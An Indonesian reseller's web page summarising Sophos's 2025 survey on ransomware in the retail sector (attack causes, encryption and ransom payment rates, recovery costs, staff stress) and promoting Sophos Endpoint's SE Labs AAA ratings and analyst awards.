Keadaan Ransomware di Sektor Ritel 2025 361 pemimpin TI dan keamanan siber mengungkap realita ransomware bagi bisnis ritel saat ini. Studi tahunan terbaru dari Sophos mengeksplorasi pengalaman nyata ransomware dari 361 organisasi ritel yang menjadi korban ransomware dalam setahun terakhir. Laporan ini menelaah bagaimana penyebab dan dampak serangan tersebut telah berkembang dari waktu ke waktu. Edisi tahun ini juga memberikan wawasan baru pada area yang sebelumnya kurang dipahami, termasuk faktor organisasi yang membuat para pelaku ritel rentan dan beban psikologis yang dirasakan tim TI dan keamanan siber ritel akibat ransomware. Unduh laporan lengkap untuk melihat temuan secara menyeluruh. Kerentanan yang Dieksploitasi, Celah Keamanan yang Tidak Diketahui, dan Keterbatasan Keahlian Menjadi Penyebab Utama Serangan Untuk tahun ketiga berturut-turut, korban ransomware di sektor ritel mengidentifikasi kerentanan yang dieksploitasi sebagai penyebab teknis serangan yang paling umum, ditemukan dalam 30% insiden. Berbagai faktor organisasi turut berkontribusi pada kerentanan organisasi ritel terhadap ransomware, dengan celah keamanan yang tidak diketahui menjadi yang paling umum, disebutkan oleh hampir setengah (46%) korban. Faktor berikutnya yang hampir sama tingginya adalah kurangnya keahlian, yang menjadi faktor dalam 45% serangan — tingkat tertinggi yang tercatat di antara sektor yang disurvei. Penyebab serangan dari sisi organisasi di sektor ritel Enkripsi Data Turun ke Level Terendah dalam 5 Tahun, Sementara Upaya Enkripsi yang Gagal Mencapai Rekor Tertinggi Enkripsi data dalam sektor ritel turun ke level terendah dalam lima tahun terakhir, dengan kurang dari setengah (48%) serangan menghasilkan enkripsi, turun dari puncak 71% pada tahun 2023. Sejalan dengan tren ini, persentase serangan yang berhasil dicegah sebelum enkripsi mencapai titik tertinggi dalam lima tahun, menunjukkan bahwa organisasi ritel memperkuat pertahanan mereka. Namun, para pelaku ancaman beradaptasi: proporsi pelaku ritel yang mengalami serangan hanya pemerasan (extortion-only), di mana data tidak dienkripsi namun tetap menuntut tebusan, meningkat tiga kali lipat, dari 2% pada 2023 menjadi 6% pada 2025. Enkripsi data di sektor ritel | 2021 – 2025 Tingkat Pembayaran Ransom yang Meningkat dan Penurunan Penggunaan Cadangan Menandakan Perubahan Strategi Pemulihan Data Ritel Persentase pelaku ritel yang membayar tebusan untuk memulihkan data hampir dua kali lipat sejak 2021 (dari 32% menjadi 58% pada 2025, jauh di atas rata-rata lintas sektor sebesar 49%). Penggunaan cadangan data berada pada level terendah dalam empat tahun, dan meskipun masih sedikit lebih umum dibanding pembayaran tebusan, perbedaan yang semakin mengecil mengindikasikan ketergantungan yang lebih besar pada metode pemulihan alternatif atau ganda. Pemulihan data terenkripsi di sektor ritel | 2021 – 2025 Permintaan Ransom Melonjak, Namun Pelaku Ritel Tangguh Rata-rata (median) permintaan tebusan kepada organisasi ritel meningkat dua kali lipat dalam setahun terakhir, mencapai $2 juta pada 2025 dibanding $1 juta pada 2024. Kenaikan tajam ini didorong oleh peningkatan 59% dalam proporsi permintaan yang melebihi $5 juta, yang tumbuh dari 17% pada 2024 menjadi 27% pada 2025. Meskipun demikian, pembayaran tebusan median hanya naik 5%, dari $950 ribu pada 2024 menjadi $1 juta pada 2025, menunjukkan bahwa pelaku ritel menunjukkan ketahanan lebih besar terhadap permintaan berlebihan. Yang menggembirakan, rata-rata (mean) biaya pemulihan dari serangan ransomware, tidak termasuk pembayaran tebusan, turun 40% dalam setahun terakhir menjadi $1,65 juta, titik terendah dalam tiga tahun. Tren ini menunjukkan bahwa meskipun pelaku ancaman menuntut lebih banyak, organisasi ritel semakin tangguh dengan memperbaiki proses pemulihan dan mungkin juga lebih tegas dalam negosiasi tebusan. Serangan Ransomware Memberi Tekanan Besar pada Tim TI/Keamanan Siber Ritel dari Pimpinan Senior Survei ini menegaskan bahwa enkripsi data akibat serangan ransomware berdampak signifikan pada tim TI/keamanan siber sektor ritel, dengan peningkatan tekanan dari pimpinan senior disebut oleh hampir setengah (47%) responden. Dampak lain yang dirasakan antara lain: Peningkatan kecemasan atau stres terkait serangan di masa depan — disebut oleh 43%. Ketidakhadiran staf karena stres/masalah kesehatan mental — disebut oleh 37%. Perasaan bersalah karena serangan gagal dihentikan — disebut oleh 34%. Unduh laporan lengkap untuk mendapatkan wawasan lebih lanjut tentang dampak manusia dan finansial ransomware di sektor ritel. Tentang Survei Laporan ini berdasarkan hasil survei independen, tanpa afiliasi vendor, yang dilakukan oleh Sophos terhadap 3.400 pemimpin TI/keamanan siber di 17 negara di Amerika, EMEA, dan Asia Pasifik, termasuk 361 dari sektor ritel. Semua responden mewakili organisasi dengan jumlah karyawan antara 100 hingga 5.000 orang. Survei dilakukan oleh spesialis riset Vanson Bourne antara Januari dan Maret 2025, dengan partisipan diminta menjawab berdasarkan pengalaman mereka selama satu tahun sebelumnya. Infrastruktur IT yang kuat adalah kunci produktivitas perusahaan. Dengan qfirewall indonesia, Anda bisa mendapatkan solusi IT lengkap yang sesuai dengan kebutuhan Anda. iLogo Indonesia sebagai mitra terpercaya siap mengintegrasikan semuanya agar bisnis Anda tetap berjalan lancar dan aman. Hubungi kami sekarang atau kunjungi qfirewall.id untuk informasi lebih lanjut!

Rahasia kesuksesan adalah konsistensi! SE Labs telah merilis laporan Endpoint Protection untuk Kuartal 2 Tahun 2025, dan kami dengan bangga mengumumkan bahwa Sophos Endpoint kembali meraih peringkat AAA dalam uji perlindungan untuk segmen Small Business (UKM) dan Enterprise (Perusahaan Besar). Sophos telah secara konsisten meraih penghargaan AAA dari SE Labs selama tiga tahun berturut-turut dengan mendeteksi dan menghentikan serangan siber nyata dan simulasi serangan tertarget. 🔗 Lihat laporan terbaru: Keamanan Endpoint: UKM Keamanan Endpoint: Enterprise Solusi Keamanan Endpoint Paling Canggih di Industri Sophos Endpoint, yang didukung oleh Intercept X, mengadopsi pendekatan menyeluruh dan berbasis pencegahan terhadap keamanan — menghentikan ancaman tanpa mengandalkan satu teknik saja. Beberapa model AI deep learning digunakan untuk menghadapi serangan yang sudah dikenal maupun yang belum pernah terlihat sebelumnya. Fitur seperti kontrol web, aplikasi, dan perangkat periferal membantu mengurangi permukaan serangan pelanggan dan memblokir vektor serangan yang umum. Analisis perilaku, anti-ransomware, anti-eksploitasi, serta teknologi canggih lainnya mampu menghentikan ancaman dengan cepat sebelum menyebar, sehingga tim IT yang kekurangan sumber daya bisa mengurangi insiden yang perlu ditangani. Kenapa Pengujian Itu Penting Pengujian independen dari pihak ketiga yang bereputasi tinggi merupakan alat penting bagi organisasi untuk membuat keputusan yang tepat terkait tumpukan teknologi dan investasi keamanan mereka. Namun, karena volume dan kompleksitas serangan semakin meningkat, hasil pengujian hanya akan bermakna jika mencerminkan realitas dunia nyata yang dihadapi organisasi. SE Labs adalah salah satu dari sedikit lembaga penguji keamanan yang menggunakan simulasi alat, taktik, teknik, dan prosedur (TTPs) modern yang saat ini digunakan oleh peretas dan pen tester. Sophos telah berpartisipasi dalam pengujian SE Labs selama bertahun-tahun dan secara konsisten menerima skor tertinggi di kategori Enterprise dan UKM. 🏆 Penghargaan SE Labs Penghargaan AAA ini menyusul keberhasilan Sophos meraih empat penghargaan sekaligus di ajang SE LABS® Awards 2025 yang diselenggarakan pada 2 Juli di London. Pengakuan ini menegaskan komitmen Sophos untuk melindungi organisasi dari berbagai skala dengan hasil keamanan siber terbaik, meskipun ancaman terus berkembang. 🎖️ Penghargaan Lain untuk Sophos Endpoint Konsistensi itu penting! Saat membantu organisasi memilih penyedia keamanan, penting untuk menunjukkan berbagai sudut pandang yang membantu mereka membuat keputusan dengan informasi yang tepat. 🔍 Kunjungi www.sophos.com/why untuk melihat rangkuman ulasan analis, hasil pengujian pihak ketiga, serta opini dari pelanggan dan mitra yang menggunakan produk Sophos setiap hari. 📈 Pencapaian Utama Sophos: 16 kali berturut-turut sebagai “Leader”: Sophos diakui sebagai Pemimpin dalam Gartner Magic Quadrant 2025 untuk Endpoint Protection Platforms (EPP). Penghargaan “Customers’ Choice”: Sophos juga dinobatkan sebagai vendor pilihan pelanggan dalam Gartner® Peer Insights™ Voice of the Customer Report 2025 untuk Endpoint Protection Platforms, selama empat tahun berturut-turut, serta dalam Voice of the Customer Report perdana untuk Extended Detection and Response (XDR). Satu-satunya vendor yang meraih status “Leader” di semua laporan G2 Grid®, untuk kategori: Endpoint Protection Suites Endpoint Detection and Response (EDR) Extended Detection and Response (XDR) Firewall Software Managed Detection and Response (MDR) Berdasarkan ulasan pengguna, Sophos meraih peringkat #1 di 36 laporan individu, mencakup pasar Antivirus, EDR, Endpoint Protection, XDR, Firewall, dan MDR. Infrastruktur IT yang kuat adalah kunci produktivitas perusahaan. Dengan qfirewall indonesia, Anda bisa mendapatkan solusi IT lengkap yang sesuai dengan kebutuhan Anda. iLogo Indonesia sebagai mitra terpercaya siap mengintegrasikan semuanya agar bisnis Anda tetap berjalan lancar dan aman. Hubungi kami sekarang atau kunjungi qfirewall.id untuk informasi lebih lanjut!